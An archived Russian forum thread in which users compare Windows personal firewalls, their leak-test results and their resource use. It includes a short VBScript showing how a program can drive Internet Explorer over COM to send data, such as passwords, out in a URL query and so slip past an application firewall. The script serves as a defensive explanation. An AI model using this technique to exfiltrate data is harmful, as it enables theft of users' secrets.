albel
ну так как его настроить ??
ps: встроенный Firewall в XP
ну так как его настроить ??
ps: встроенный Firewall в XP
» Лучший файрволл firewall
estimated
Цитата:
спасибо за анализ. и, если можно, пару вопросов...
1. что в реальной работе может вызвать внутреннее пробивание файра? троян?
2. какими неприятностями это грозит? примеры, если можно...
ps. у меня дефолтный браузер MyIE2. выход запрещен. используется для просмотра локальных документов. рабочий браузер - Mozilla FireFox. ходит через локальный фильтрующий прокси Proxomitron.
Цитата:
Kerio 2.1.5 и без sandbox'а может запросто блокировать AWFT leaktest! Все зависит только от настроек, т.е. каким программам разрешены коннекты.
спасибо за анализ. и, если можно, пару вопросов...
1. что в реальной работе может вызвать внутреннее пробивание файра? троян?
2. какими неприятностями это грозит? примеры, если можно...
ps. у меня дефолтный браузер MyIE2. выход запрещен. используется для просмотра локальных документов. рабочий браузер - Mozilla FireFox. ходит через локальный фильтрующий прокси Proxomitron.
spike
В Services прописать нужные порты. Кстати, попробуй посмотреть ещё TCP/IP Filtering в свойствах интернет-соединения - может, так что заблокировано?
Про домен, к сожалению, ничего сказать не могу
. Может, что ещё сможет помочь.
В Services прописать нужные порты. Кстати, попробуй посмотреть ещё TCP/IP Filtering в свойствах интернет-соединения - может, так что заблокировано?
Про домен, к сожалению, ничего сказать не могу
. Может, что ещё сможет помочь.speakerr
1. трояны, вирусы, шпионский софт (кража паролей или просто статистическая информация, напр. какой-нибудь медиаплейер, сообщающий статистику прослушиваемой музыки и наличие цифровых лицензий на нее); просто программки, сообщающие разработчику, каким серийным номером они были зарегистрированы, и т.п.
2. Зависит от профиля использования компьютера. Если каждый день не запускается десяток новых програм неизвестного происхождения, то особо бояться нечего. Для гарантии можно не пользоваться интернетом :) Конкретные последствия зависят от конкретного используемого софта. Если есть сомнения в чистоте своей системы - пожалуйста, существуют антивирусы. Если сомнения по поводу конкретных программ - имеет смысл почитать обсуждения этих программ на форумах (рекомендую ru-board :)
Ну, да в общем эти моменты и так понятны. Только не принимай меня за эксперта :) я обычный юзер, ну может слегка продвинутый :)
1. трояны, вирусы, шпионский софт (кража паролей или просто статистическая информация, напр. какой-нибудь медиаплейер, сообщающий статистику прослушиваемой музыки и наличие цифровых лицензий на нее); просто программки, сообщающие разработчику, каким серийным номером они были зарегистрированы, и т.п.
2. Зависит от профиля использования компьютера. Если каждый день не запускается десяток новых програм неизвестного происхождения, то особо бояться нечего. Для гарантии можно не пользоваться интернетом :) Конкретные последствия зависят от конкретного используемого софта. Если есть сомнения в чистоте своей системы - пожалуйста, существуют антивирусы. Если сомнения по поводу конкретных программ - имеет смысл почитать обсуждения этих программ на форумах (рекомендую ru-board :)
Ну, да в общем эти моменты и так понятны. Только не принимай меня за эксперта :) я обычный юзер, ну может слегка продвинутый :)
estimated
Цитата:
эти моменты то понятны... но... пробить файер "вредная" программа может только с помощью использования другой программы, правило и сигнатура которой прописаны в правилах. так ведь? я правильно понял? остальное упрется в правильно прописанную стенку... в частности, в твоем анализе речь шла лишь о возможности использование дефолтного браузера... так вот... КАК с помощью того же IE, вызванного "партизаном", можно поиметь неприятности? какие? ну, понимаю, что может всплыть окно с загруженной похабщиной... а ЧТО еще? как может что-то "убежать" от меня за границу с помощью IE? вот об этом я спрашивал.... т.е. о конкретной ситуации, описанной тобой, а не о "абстрактных ужастиках"...
Цитата:
Ну, да в общем эти моменты и так понятны.
эти моменты то понятны... но... пробить файер "вредная" программа может только с помощью использования другой программы, правило и сигнатура которой прописаны в правилах. так ведь? я правильно понял? остальное упрется в правильно прописанную стенку... в частности, в твоем анализе речь шла лишь о возможности использование дефолтного браузера... так вот... КАК с помощью того же IE, вызванного "партизаном", можно поиметь неприятности? какие? ну, понимаю, что может всплыть окно с загруженной похабщиной... а ЧТО еще? как может что-то "убежать" от меня за границу с помощью IE? вот об этом я спрашивал.... т.е. о конкретной ситуации, описанной тобой, а не о "абстрактных ужастиках"...
speakerr:
Цитата:
в общем, да. Тем или иным образом используются права, явно предоставленные пользователем другой программе.
Цитата:
Запросто. Было бы чему убегать. Т.е. имеется ли информация, утечка которой может причинить ущерб. (Если таковой не имеется, то дальше можешь не читать :) Окно IE при этом не обязательно будет всплывать: оно может быть и скрытым (как и любое другое окно в Windows).
Я уже писал об это, но повторюсь (можешь открыть этот топик "для печати" и поискать по "WScript.CreateObject", там более подробно описано).
Сделай файл "test.vbs":
Код:
set ie=WScript.CreateObject("InternetExplorer.Application", "ie_")
ie.navigate "http://www.ya.ru/yandsearch?text=твои_пароли"
ie.visible=true
WScript.Quit
Цитата:
пробить файер "вредная" программа может только с помощью использования другой программы, правило и сигнатура которой прописаны в правилах.
в общем, да. Тем или иным образом используются права, явно предоставленные пользователем другой программе.
Цитата:
КАК с помощью того же IE, вызванного "партизаном", можно поиметь неприятности? какие? ну, понимаю, что может всплыть окно с загруженной похабщиной... а ЧТО еще? как может что-то "убежать" от меня за границу с помощью IE?
Запросто. Было бы чему убегать. Т.е. имеется ли информация, утечка которой может причинить ущерб. (Если таковой не имеется, то дальше можешь не читать :) Окно IE при этом не обязательно будет всплывать: оно может быть и скрытым (как и любое другое окно в Windows).
Я уже писал об это, но повторюсь (можешь открыть этот топик "для печати" и поискать по "WScript.CreateObject", там более подробно описано).
Сделай файл "test.vbs":
Код:
set ie=WScript.CreateObject("InternetExplorer.Application", "ie_")
ie.navigate "http://www.ya.ru/yandsearch?text=твои_пароли"
ie.visible=true
WScript.Quit
estimated
Цитата:
а это не суть важно... вызов можно сделать совершенно по-разному.
Цитата:
вот это главное. нда... я совсем "забыл" про передачу параметров методом GET. стормозил.
спасибо.
Цитата:
Я уже писал об это, но повторюсь (можешь открыть этот топик "для печати" и поискать по "WScript.CreateObject", там более подробно описано).
а это не суть важно... вызов можно сделать совершенно по-разному.
Цитата:
"http://www.ya.ru/yandsearch?text="твои_пароли"
вот это главное. нда... я совсем "забыл" про передачу параметров методом GET. стормозил.
спасибо.
speakerr
Цитата:
Вот именно, и передавать инфу можно тоже по-разному. Можно прямо в командной строке. Работает, наверное, во всех броузерах.
Строку "WScript.CreateObject" (в процитированном тобой месте) я привел только для того, чтобы ты мог быстро найти мой давний пост в этой теме! Там же смотри о передаче инфы через командную строку.
Добавлено
Поправка: через командную строку - наверное все же не "другой метод", а все та же отправка данных формы методом GET.
Цитата:
вызов можно сделать совершенно по-разному
Вот именно, и передавать инфу можно тоже по-разному. Можно прямо в командной строке. Работает, наверное, во всех броузерах.
Строку "WScript.CreateObject" (в процитированном тобой месте) я привел только для того, чтобы ты мог быстро найти мой давний пост в этой теме! Там же смотри о передаче инфы через командную строку.
Добавлено
Поправка: через командную строку - наверное все же не "другой метод", а все та же отправка данных формы методом GET.
estimated
Цитата:
угу. а если принять как аксиому факт построения приложений Windows на технологии COM, то считаю, что рассуждать про возможность "глобального" отслеживания ситуации "откуда у приложения руки растут", по крайней мере несерьезно... куда, интересно, "анализатор" должен залезть? отслеживать все инициализации COM интерфейсов? на которых живет сама система? это покруче будет не только чем сам файр, а чем сама ОС... imho. учитывая всю порочность самой технологии COM... тянущей за собой уже умершие интерфейсы... новые... не до конца соответствующие самому стандарту... дур. дом. да, и самое главное... а причем здесь файр? где таки должна кончаться граница его "ответсвенности"? думаю, то, что делает тот же kerio 2.1.5 - вполне "оптимально разумно". как с точки зрения "постановки задачи", так и с точки зрения ее реализации... остальное все просто нужно возложить на банально известные средства в виде тех же ативирусных пакетов. что, в общем-то, и делается в реальной жизни...
Цитата:
да. он самый.
Цитата:
>>вызов можно сделать совершенно по-разному
Вот именно, и передавать инфу можно тоже по-разному. Можно прямо в командной строке. Работает, наверное, во всех броузерах.
угу. а если принять как аксиому факт построения приложений Windows на технологии COM, то считаю, что рассуждать про возможность "глобального" отслеживания ситуации "откуда у приложения руки растут", по крайней мере несерьезно... куда, интересно, "анализатор" должен залезть? отслеживать все инициализации COM интерфейсов? на которых живет сама система? это покруче будет не только чем сам файр, а чем сама ОС... imho. учитывая всю порочность самой технологии COM... тянущей за собой уже умершие интерфейсы... новые... не до конца соответствующие самому стандарту... дур. дом. да, и самое главное... а причем здесь файр? где таки должна кончаться граница его "ответсвенности"? думаю, то, что делает тот же kerio 2.1.5 - вполне "оптимально разумно". как с точки зрения "постановки задачи", так и с точки зрения ее реализации... остальное все просто нужно возложить на банально известные средства в виде тех же ативирусных пакетов. что, в общем-то, и делается в реальной жизни...
Цитата:
Поправка: через командную строку - наверное все же не "другой метод", а все та же отправка данных формы методом GET.
да. он самый.
speakerr
Цитата:
Да, это круто, но ... возможно! Tiny 5 позволяет это делать (смотри здесь подробнее: Access to OLE and COM interfaces). Другое дело, что таким макаром очень легко заморочиться с настройками, так что получится
Цитата:
Цитата:
несколько лет назад можно было бы сказать: ни при чем, тогда под файрволом понимался чисто сетевой фильтр. Но в последние годы почти все файрволы в той или иной степени (чемпион здесь, наверное, Tiny 5) включают в себя функциональность sandbox'а - т.е. контроль за запуском и взаимодействием приложений. При этом эти продукты зачастую продолжают все так же называть "файрвол". Ну и возникают непонятки ...
Цитата:
Да, для меня это тоже пока оптимальный и достаточный вариант.
Одно время пробовал SSM, понравилось, хочу опять поставить и настроить, но как то не доходят руки.
Цитата:
отслеживать все инициализации COM интерфейсов?
Да, это круто, но ... возможно! Tiny 5 позволяет это делать (смотри здесь подробнее: Access to OLE and COM interfaces). Другое дело, что таким макаром очень легко заморочиться с настройками, так что получится
Цитата:
дур. дом
Цитата:
а причем здесь файр
несколько лет назад можно было бы сказать: ни при чем, тогда под файрволом понимался чисто сетевой фильтр. Но в последние годы почти все файрволы в той или иной степени (чемпион здесь, наверное, Tiny 5) включают в себя функциональность sandbox'а - т.е. контроль за запуском и взаимодействием приложений. При этом эти продукты зачастую продолжают все так же называть "файрвол". Ну и возникают непонятки ...
Цитата:
думаю, то, что делает тот же kerio 2.1.5 - вполне "оптимально разумно"
Да, для меня это тоже пока оптимальный и достаточный вариант.
Одно время пробовал SSM, понравилось, хочу опять поставить и настроить, но как то не доходят руки.
фух...народ, помогите советом добрым плиз
стоял у меня sygate pro. был им доволен и ффсё такое, но на 2003 вэб эдишын винде у него начали глюки происходить: стал жрать проц дико (до 50% и более иногда)
нэтбиос запрещён, фсе настройки на максимум секьюоити
80 порт открыт. проблем с соединением ко мне не было ни у кого
но фаер прям с ума сходит
таму решил поменять
требования к фаеру такие: умение закрывать ффсе порты, чтоб показывал список соединений(активных и уже нет), обучающийся режим, чтоб показывал трафф входящий/исходящий. жрал минимум памяти и ПРОЦА. чтоб были правила дополнительные для опр. приложения
помогите плиз с выбором.
tiny, armor2net,outpost2,zonealarm 4.5 ставил-не прижились или я не прижился к ним
уж не знаю куда бежать..тока нортон и макафи остались наверное (не помню керио ставил или нет)
стоял у меня sygate pro. был им доволен и ффсё такое, но на 2003 вэб эдишын винде у него начали глюки происходить: стал жрать проц дико (до 50% и более иногда)
нэтбиос запрещён, фсе настройки на максимум секьюоити
80 порт открыт. проблем с соединением ко мне не было ни у кого
но фаер прям с ума сходит
таму решил поменять
требования к фаеру такие: умение закрывать ффсе порты, чтоб показывал список соединений(активных и уже нет), обучающийся режим, чтоб показывал трафф входящий/исходящий. жрал минимум памяти и ПРОЦА. чтоб были правила дополнительные для опр. приложения
помогите плиз с выбором.
tiny, armor2net,outpost2,zonealarm 4.5 ставил-не прижились или я не прижился к ним
уж не знаю куда бежать..тока нортон и макафи остались наверное (не помню керио ставил или нет)
backup
Visnetic Firewall =
Цитата:
if you want app control then try to combain Visnetic + ZoneAlarm (disabled Traffic filter)
Visnetic Firewall =
Цитата:
умение закрывать ффсе порты, чтоб показывал список соединений(активных и уже нет), обучающийся режим, чтоб показывал трафф входящий/исходящий. жрал минимум памяти и ПРОЦА.
if you want app control then try to combain Visnetic + ZoneAlarm (disabled Traffic filter)
Цитата:
на 2003 вэб эдишын
угу, серверный вариант тебе должен быть как раз в тему: Visnetic Firewall Pro от www.deerfield.com
а я вот засек, что sygate у меня скорость в сетке режет с 800 кб в сек. до 400-500.
вылечить не смог, мож кто чего подскажет?
если не вылечу, хотелось бы другую стенку, основное требование - легкая по ресурсоемкости.
вылечить не смог, мож кто чего подскажет?
если не вылечу, хотелось бы другую стенку, основное требование - легкая по ресурсоемкости.
vito333
Я тоже sygate оставил из за лагов (он долго пакет обрабатывает и пока лог запишет идет отруб сети по лану играть невожможно) поэтому зижу на VisNetik 2.2.12 и ZoneAlarm (для прог) очень быстрый, лагов почти нет, ресурсов почти нежрет : Ram 7.036 MB CPU 00-02% при постоянном обмене данными осел, игры, IE и т.д.
Я тоже sygate оставил из за лагов (он долго пакет обрабатывает и пока лог запишет идет отруб сети по лану играть невожможно) поэтому зижу на VisNetik 2.2.12 и ZoneAlarm (для прог) очень быстрый, лагов почти нет, ресурсов почти нежрет : Ram 7.036 MB CPU 00-02% при постоянном обмене данными осел, игры, IE и т.д.
А ссылка из шапки
Firewal Leak Tester: сводная таблица результатов -- уже не работает?
Firewal Leak Tester: сводная таблица результатов -- уже не работает?
ArchNet: да что-то вообще с http://perso.wanadoo.fr/ случилось. Будем надеяться, что это у них временные проблемы ...
backup
vito333
pcInternet Patrol 3.0 build 5
http://forum.ru-board.com/topic.cgi?forum=5&topic=11178#1
vito333
pcInternet Patrol 3.0 build 5
http://forum.ru-board.com/topic.cgi?forum=5&topic=11178#1
gavana
дорого стОит она
интерфейс -5 баллов.
Надеюсь, с безопасностью все тож хорошо. Только уж методы больно навороченные
дорого стОит она
интерфейс -5 баллов.
Надеюсь, с безопасностью все тож хорошо. Только уж методы больно навороченные
gavana
albel
Может и навороченные - только не программа это вовсе, а подписка на сервис. Чтобы не повторяться - см. мой пост в соответвтующем топике
http://forum.ru-board.com/topic.cgi?forum=5&topic=11178#4
albel
Может и навороченные - только не программа это вовсе, а подписка на сервис. Чтобы не повторяться - см. мой пост в соответвтующем топике
http://forum.ru-board.com/topic.cgi?forum=5&topic=11178#4
Господа, а кто что о McAfee Desktop Firewall может сказать я его уже неделю юзаю по ходу полный рулез, всё делает как надо, вроде и он-лайн тесты все продит (кроме PC-Flank ну их только аутпост проходит всилу ряда известных причин), а если ещё и ручками не много поработать дак вообще всё прекрасно, может кто какие выскажит какие к него недостатки есть... 
Я кста по нему темку открыл,так как считаю неуместным постить в теме по McAfee Firewall Pro т.к это совершенно разные продукты для разных целей и с разными возможностями.
Я кста по нему темку открыл,так как считаю неуместным постить в теме по McAfee Firewall Pro т.к это совершенно разные продукты для разных целей и с разными возможностями. эх, встроили бы мастера по настройке в ЛукнСтоп - я б на него перешел надолго, а так знаний не хватает ...
Классная конечно штука - Norton Internet Security 2004. Возможностей море: и спам фильтрует, и баннеры режет, и персональную информацию в сеть не отдаёт! Это кроме собственно firewall'а. Не глючит, к тому же. Вот только одно большое но: настроить её, особено чтобы нормально приложения контролировала - это умереть можно. Пока перероешь с десяток тормознутых окошек... Проще сразу сказать "permit all". В Аутпосте это всё гораздо проще сделано.
Всем привет! На мой взгляд два самых лучших файрвола - это Outpost и AtGuard... Ни первый ни второй у меня не глючат... работают без проблем... и в Win98 работали и в Win2000 тоже без проблем работают... если праильно настроить, то и работать они будут правильно!
FuriaCeca
Цитата:
Ему уже сто лет в обед, поэтому о какой-то надёжной защите говорить не приходится.
Разве что в качестве баннерорезалки использовать, да и то есть софтины получше для этого.
Цитата:
AtGuard...
Ему уже сто лет в обед, поэтому о какой-то надёжной защите говорить не приходится.
Разве что в качестве баннерорезалки использовать, да и то есть софтины получше для этого.
FuriaCeca
Цитата:
Цитата:
любой троян может его убить (TerminateProcess)
Цитата:
это Outpost
Цитата:
о какой-то надёжной защите говорить не приходится.
любой троян может его убить (TerminateProcess)
SXP
Цитата:
А какой же это firewall, которому нельзя сделать "TerminateProcess", не подскажешь???
Под 98-ой это любой проге можно сделать, и под NT вроде тоже, если сам сидишь под админом.
Кстати, если сидеть под dial-up'ом, то IMHO достаточно и встроенного в ХР firewall'а.
Это, конечно, если не требуется контролировать активность приложений...
Цитата:
любой троян может его убить (TerminateProcess)
А какой же это firewall, которому нельзя сделать "TerminateProcess", не подскажешь???
Под 98-ой это любой проге можно сделать, и под NT вроде тоже, если сам сидишь под админом.
Кстати, если сидеть под dial-up'ом, то IMHO достаточно и встроенного в ХР firewall'а.
Это, конечно, если не требуется контролировать активность приложений...
Цитата:
Visnetic Firewall =
умение закрывать ффсе порты, чтоб показывал список соединений(активных и уже нет), обучающийся режим, чтоб показывал трафф входящий/исходящий. жрал минимум памяти и ПРОЦА.
if you want app control then try to combain Visnetic + ZoneAlarm (disabled Traffic filter)
ага, фильтрация нужна тока по апликэйшынам.
а обучающий режим визнетика я так и не прохавал
ещё он не показывает какая совтина в сеть ломится, а для меня это критично
хорошо что отдельные правила для каждого сетевого адаптора
а 2 фаера не хочу держать
может всё таки есть что-нить ещё?
GreenGremlin
Цитата:
может глупость сморожу, но юзаю Visnetic, дык там в обработку "TerminateProcess" входит предупредиловка, раз, а вторая опция позволяет блокировать весь траффик при незагруженном файре. Панацея? - ДА !!!
Цитата:
А какой же это firewall, которому нельзя сделать "TerminateProcess", не подскажешь???
может глупость сморожу, но юзаю Visnetic, дык там в обработку "TerminateProcess" входит предупредиловка, раз, а вторая опция позволяет блокировать весь траффик при незагруженном файре. Панацея? - ДА !!!
Sky hawk
Цитата:
Что он у тебя по этим портам показывает? (stealthed или что-то другое)
https://grc.com/x/portprobe=0
https://grc.com/x/portprobe=1
Добавлено
как у него с контролем доступа на localhost ?
Цитата:
McAfee Desktop Firewall 8
Что он у тебя по этим портам показывает? (stealthed или что-то другое)
https://grc.com/x/portprobe=0
https://grc.com/x/portprobe=1
Добавлено
как у него с контролем доступа на localhost ?
Страницы: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566
Предыдущая тема: Почтовые проблемки
Форум Ru-Board.club — поднят 15-09-2016 числа. Цель - сохранить наследие старого Ru-Board, истории становления российского интернета. Сделано для людей.